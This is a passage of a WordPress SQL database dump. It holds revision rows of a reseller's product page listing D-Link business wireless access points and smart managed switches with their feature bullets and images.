src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 15:09:42','2019-09-25 07:09:42','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3418,1,'2019-09-25 15:10:16','2019-09-25 07:10:16','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports</p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Cable diagnostics function to help troubleshooting wiring problem</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 15:10:16','2019-09-25 07:10:16','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3419,1,'2019-09-25 15:10:38','2019-09-25 07:10:38','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports</p><p>Suitable for virtualization, cloud services and 